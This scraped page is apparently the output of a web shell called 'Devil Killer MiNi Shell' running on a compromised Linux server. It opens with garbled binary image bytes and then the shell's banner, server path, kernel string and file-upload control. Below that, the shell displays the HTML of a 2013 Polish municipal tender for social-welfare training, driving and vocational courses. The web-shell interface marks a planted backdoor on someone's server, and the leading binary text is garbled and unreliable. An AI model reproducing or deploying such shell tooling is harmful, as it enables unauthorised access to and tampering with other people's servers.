JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130506/66767-N-2013.html

<p class="kh_header"><b>Międzyrzec Podlaski: Usługi szkoleniowe w ramach projektu systemowego: Od bierności do aktywności klientów pomocy społecznej poprzez pracę socjalną w Gminie Międzyrzec Podlaski</b><br>
<b>Numer ogłoszenia: 66767 - 2013; data zamieszczenia: 06.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Międzyrzecu Podlaskim , ul. Warszawska 20, 21-560 Międzyrzec Podlaski, woj. lubelskie, tel. 83 371 69 30, faks 83 371 69 30.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe w ramach projektu systemowego: Od bierności do aktywności klientów pomocy społecznej poprzez pracę socjalną w Gminie Międzyrzec Podlaski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: Usługi szkoleniowe w ramach projektu systemowego: 
Od bierności do aktywności klientów pomocy społecznej poprzez pracę socjalną w Gminie Międzyrzec Podlaski w ramach projektu systemowego realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej w 2013 roku.
Usługi szkolenia podzielono na trzy części:
Część 1. Przedmiot zamówienia: Warsztaty kompetencji i umiejętności społecznych
Warsztaty w zakresie:
- trening kompetencji i umiejętności społecznych; wsparcie psychologiczne,
- kształtowania wizerunku,
- edukacji finansowej w zakresie budżetu i prowadzenia gospodarstwa domowego,
- umiejętności poruszania się na rynku pracy, zajęcia z doradcą zawodowym.
Zakres zamówienia:
1. Termin szkolenia: maj - czerwiec 2013 r.
2. Miejsce szkolenia: Międzyrzec Podlaski. Warunki lokalowe, sale szkoleniowe oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż
3. Czas szkolenia: zajęcia od poniedziałku do piątku, z wyłączeniem sobót i niedziel w godzinach 8:00 - 16:00
4. Forma zajęć:
- trening kompetencji i umiejętności społecznych: minimum 8 godz. szkoleniowych (po 45 minut) w grupie x  2 grupy po 14 osób - razem 16 godz. szkoleniowych
-  wsparcie psychologiczne: min. 4 godz. szkoleniowe zajęć grupowych x 2 grupy = 8 godz. szkoleniowych oraz min. 1 godz. szkoleniowa konsultacji indywidualnych na osobę x 28 osób = 28 godz. szkoleniowych - razem   36 godz. szkoleniowych
- warsztaty kształtowania wizerunku: min.8 godz. szk. w grupie x 2 grupy po 14 osób - razem 16 godz. szkoleniowych 
- warsztaty edukacji finansowej w zakresie budżetu i prowadzenia gospodarstwa domowego:
- min.8 godz.  szk. w grupie x 2 grupy po 14 osób = 16 godz. szkoleniowych
- warsztaty z zakresu umiejętności poruszania się na rynku pracy: zajęcia grupowe - min. 4 godz. szk. x 2 grupy po 14 osób = 8 godz. szk. oraz konsultacje indywidualne z doradcą zawodowym - min.1 godz. szk. na osobę x 28 osób = 28 godz. szk. Razem 36 godz. szkoleniowych
5. Zapewnienie cateringu na zajęciach (kawa, herbata, woda gazowana i niegazowana, ciastka, obiad dwudaniowy - dania każdego dnia powinny być inne)
6. Liczba uczestników warsztatów: 28 osób (beneficjenci projektu)
7. Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, zapewnienie materiałów biurowych dla wszystkich uczestników szkolenia (materiały szkoleniowe, teczka, notes, długopis, wydanie certyfikatów, zaświadczeń o ukończeniu szkolenia)
8. Przygotowanie raportu ewaluacyjnego szkoleń (opracowanie po stronie wykonawcy)
9. Pełna dokumentacja szkoleń: listy obecności uczestników, arkusze zajęć, raport z hospitacji zajęć szkoleniowych, lista odbioru materiałów szkoleniowych, lista odbioru posiłków, imienne pokwitowanie zwrotu kosztów dojazdu
10. Ubezpieczenie uczestników szkolenia NNW
11. Zwrot kosztów dojazdu stosownie do odległości w cenie najtańszego biletu komunikacji publicznej (odległość dojazdu do 15 km)
Część 2. Przedmiot zamówienia: Kurs prawa jazdy kategorii B, C oraz C+E
Zakres zamówienia:
1. Przeprowadzenie kursu prawa jazdy kat. B - dla 9 osób
2. Przeprowadzenie kursu prawa jazdy kat. C - dla 4 osób
3. Przeprowadzenie kursu prawa jazdy kat. C+E - dla 1 osoby
4. Wykłady część teoretyczna i praktyczna nauka jazdy zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U.2005.217.1834 z późn zmian.)
5. Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, zapewnienie materiałów biurowych dla wszystkich uczestników szkolenia (materiały szkoleniowe (podręczniki i płyty CD) teczka, notes, długopis, wydanie certyfikatów, zaświadczeń o ukończeniu szkolenia)
6. Badanie lekarskie i badania psychotechniczne (w przypadku kursu prawa jazdy C i C+E)
7. Przeprowadzenie egzaminu teoretycznego wewnętrznego
8. Opłacenie pierwszego państwowego egzaminu teoretycznego i praktycznego dla uczestników kursu
9. Termin realizacji: maj - sierpień w godz. 8:00 - 16:00 od poniedziałku do piątku  
10. Miejsce realizacji kursu: Międzyrzec Podlaski. Warunki lokalowe, sale szkoleniowe oraz wykorzystywany  sprzęt muszą spełniać wymogi prawne w zakresie BHP i p.poż
11. Organizator kursu zapewnia: sprzęt niezbędny do przeprowadzenia szkolenia praktycznego            
12. Ubezpieczenie uczestników szkolenia NNW

Część 3. Przedmiot zamówienia: Kursy zawodowe.
Zakres zamówienia:
1. Kurs zawodowy Sprzedawca z obsługą komputera i kasy fiskalnej - dla 9 osób w minimalnej liczbie 100 godzin szkoleniowych (po 45 min.) zajęć teoretycznych i praktycznych. Miejsce szkolenia: Międzyrzec Podlaski 
2. Kurs zawodowy Magazynier - kierowca wózków jezdniowych z napędem silnikowym - dla 5 osób w minimalnej liczbie 100 godzin szkoleniowych (po 45 min) zajęć teoretycznych i praktycznych. Miejsce szkolenia Międzyrzec Podlaski lub dojazd do 30 km od Międzyrzeca Podlaskiego.
3. Kurs zawodowy Kosmetyczka - dla 1 osoby w minimalnej liczbie 160 godzin szkoleniowych (po 45 min) zajęć teoretycznych i praktycznych. Miejsce szkolenia: Międzyrzec Podlaski lub dojazd do 30km od Międzyrzeca Podlaskiego
4. Termin szkolenia czerwiec  - sierpień  2013 r. w godz. 8:00 - 16:00 od poniedziałku do piątku  
5. Ubezpieczenie uczestników szkolenia NNW
6. Zwrot kosztów dojazdu stosownie do odległości w cenie najtańszego biletu komunikacji publicznej (odległość dojazdu do 30 km)
7. Badania lekarskie (tylko wymagane dla poszczególnych kursów)
8. Zapewnienie cateringu na zajęciach (kawa, herbata, woda gazowana i niegazowana, ciastka, obiad dwudaniowy- dania każdego dnia powinny być inne)
9. Przygotowanie szczegółowego programu oraz harmonogramu szkolenia, zapewnienie materiałów biurowych dla wszystkich uczestników szkolenia (materiały szkoleniowe, teczka, notes, długopis, wydanie certyfikatów, zaświadczeń o ukończeniu szkolenia)
10. Pełna dokumentacja szkoleń: listy obecności uczestników, zaświadczenia o ukończeniu kursu
11. Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt  muszą spełniać wymogi prawne w zakresie BHP i p.po.z.

W ramach realizacji niniejszego zamówienia Wykonawca zobowiązuje się także do:
1. Opracowania szczegółowych programów szkoleń, które będą obejmowały m. in.: nazwę i zakres szkolenia, czas trwania i sposób organizacji szkolenia, cele szkolenia, plan nauczania określający tematy zajęć w określonych modułach oraz ich wymiar, z uwzględnieniem części teoretycznej i części praktycznej, wykaz niezbędnych środków i materiałów dydaktycznych, imienną listę trenerów skierowanych do przeprowadzenia szkoleń i szczegółowych harmonogramów szkoleń oraz przedłożenia ich do zaakceptowania Zamawiającemu nie później niż 7 dni od dnia zawarcia umowy (chyba, że strony ustalą termin krótszy).
2. Przeprowadzenia szkoleń zgodnie z ww. harmonogramami szkoleń i szczegółowymi programami szkoleń.
3. Zapewnienia, iż osoby prowadzące szkolenia będą dysponowały wiedzą i kwalifikacjami niezbędnymi do jego przeprowadzenia.
4. Zapewnienia zastępstwa w przypadkach, kiedy wybrany wykładowca nie będzie mógł z przyczyn obiektywnych poprowadzić szkolenia.
5. Wyznaczenia osoby do kontaktu z Zamawiającym, odpowiedzialnej za dbałość o wysoką jakość zajęć i upoważnionej do podejmowania wiążących decyzji w kwestiach związanych z realizowanymi szkoleniami.
6. Przygotowania i przekazania bezzwrotnych materiałów szkoleniowych: podręczników, skryptów w wersji papierowej w ilości odpowiadającej liczbie szkolonych osób (po 1 egzemplarzu materiałów szkoleniowych dla każdego uczestnika danego szkolenia) niezbędnych do prawidłowego przebiegu szkoleń i przygotowania do egzaminu końcowego, a nadto jeden dodatkowy egzemplarz opracowanych materiałów przeznaczonych dla Zamawiającego.
7. Sprawowania nadzoru i udzielania niezbędnej pomocy i wskazówek w trakcie prowadzenia szkoleń 
8. Zapewnienia lokalu i niezbędnych maszyn i urządzeń (jeżeli szkolenie tego wymaga)  dla prowadzących zajęcia szkoleniowe.
9. Wydania uczestnikom zaświadczeń potwierdzających udział w szkoleniu (zgodnych ze wzorem zaświadczenia zawartym w rozporządzeniu Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) - załącznik Nr 1 do rozporządzenia.
10. Systematycznego i prawidłowego przygotowania i prowadzenia dokumentacji ze szkoleń, w tym m. in. list obecności, dzienników szkoleń (uwzględniających m. in. dni, godziny, liczbę osób oraz tematykę zrealizowanych zajęć, podpisy prowadzących zajęcia), list potwierdzających odbiór materiałów szkoleniowych, a także zaświadczeń o ukończeniu szkolenia, z podaniem daty odbioru i czytelnym podpisem uczestnika.
11. Przeprowadzenia wśród uczestników szkoleń:
- ankiet ewaluacyjnych dotyczących oceny efektywności szkolenia (ankietyzacja przed i po zakończeniu szkolenia);
- testów sprawdzających opanowanie zrealizowanego materiału szkoleniowego.
12. Przekazanie zamawiającemu w terminie do 7 dni od dnia zakończenia szkolenia w poszczególnych grupach:
- list obecności uczestników szkoleń,
- list odbioru przez uczestników materiałów szkoleniowych oraz zaświadczeń o ukończeniu szkolenia, z podaniem daty odbioru i czytelnym podpisem uczestnika;
- list odbioru przez uczestników posiłków, 
- imiennych pokwitowań zwrotu kosztów dojazdu,
- dzienników szkoleń;
- kopii wszystkich wydanych uczestnikom zaświadczeń o ukończeniu szkolenia,
- ankiet ewaluacyjnych dotyczących oceny efektywności szkolenia,
13. Sporządzenia protokołu zdawczo - odbiorczego dotyczącego wykonania przedmiotu zamówienia terminie 7 dni od dnia zakończenia szkolenia ostatniej grupy.
14. Oznakowania pomieszczeń, w których będą odbywały się zajęcia oraz dokumentacji wytworzonej w ramach realizacji niniejszego zamówienia poprzez umieszczenie informacji o współfinansowaniu szkoleń ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, logotypów PO KL, EFS, UE, zgodnie z aktualnymi Wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki oraz Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
15. Dołożenia należytej staranności przy wykonywaniu umowy.

Zamawiający zastrzega sobie możliwość kontroli na każdym etapie realizacji zamówienia. Zamawiający zastrzega sobie możliwość kontroli wszystkich dokumentów, w tym finansowych związanych z realizacją Projektu również przez Instytucję Wdrażającą (Instytucję Pośredniczącą II stopnia) oraz inne uprawnione podmioty w zakresie prawidłowej realizacji Projektu. 
Wykonawca zobowiązany jest do przechowywania dokumentacji związanej z realizacją projektu w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją projektu.
W szkoleniu wezmą udział osoby skierowane przez Zamawiającego. W szkoleniu nie mogą brać udziału inne osoby. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie szkolenia dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób skierowanych na szkolenie. Zamawiający przekaże Wykonawcy przed rozpoczęciem szkolenia imienny wykaz, zawierający niezbędne dane osób skierowanych na szkolenie. Zamawiający zastrzega sobie prawo dokonania zmiany osób skierowanych na szkolenie do czasu rozpoczęcia szkolenia oraz w czasie jego trwania, jeżeli będzie możliwa i celowa realizacja programu szkolenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.10.00-8, 80.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia ten warunek jeżeli wykaże, że należycie przeprowadził w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
- Część 1 - 1 usługę z zakresu odpowiadającej części 1 przedmiotu zamówienia,
- Część 2 - 1 usługę z zakresu odpowiadającej części 2 przedmiotu zamówienia, 
- Część 3 - 1 usługę z zakresu odpowiadającej części 3 przedmiotu zamówienia, 
z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dowodów, że ta usługa zostały wykonana lub jest wykonywana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia ten warunek jeżeli wykaże, że dysponuje:
Część I: co najmniej jedną osobą, która:
- posiada wykształcenie co najmniej wyższe magisterskie na kierunku psychologia; 
- przeprowadziła w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 szkolenia z zakresu trening kompetencji i umiejętności społecznych, kształtowania wizerunku, edukacji finansowej w zakresie budżetu i prowadzenia gospodarstwa domowego, umiejętności poruszania się na rynku pracy.
Część II: co najmniej jedną osobę, która:
- posiadają uprawnienia instruktora nauki jazdy dla poszczególnych kategorii B, C, C+E; 
- przeprowadziła w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 szkolenia z zakresu nauki jazdy w kategorii B, C, C+E;
Część III: co najmniej jedną osobie, która:
- przeprowadziła w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej po 2 szkolenia z zakresu Sprzedawca z obsługą komputera i kasy fiskalnej, Magazynier - kierowca wózków jezdniowych z napędem silnikowym i Kosmetyczka.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany umowy.
1. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy. 
2. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy. 
3. Zmiany terminów szkoleń składających się na przedmiot umowy, jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie szkolenia (w szczególności: choroba trenera, siła wyższa, choroba uczestników). 
4. Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. 
5. Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. 
6. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecgmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego: Gminny Ośrodek Pomocy Społecznej w Międzyrzecu Podlaskim, ul. Warszawska 20, 21-560 Międzyrzec Podlaski, w pokoju Kierownika GOPS (pokój nie numerowany)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2013 godzina 09:00, miejsce: W siedzibie zamawiającego: Gminny Ośrodek Pomocy Społecznej w Międzyrzecu Podlaskim, ul. Warszawska 20, 21-560 Międzyrzec Podlaski, w pokoju Kierownika GOPS (pokój nie numerowany)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




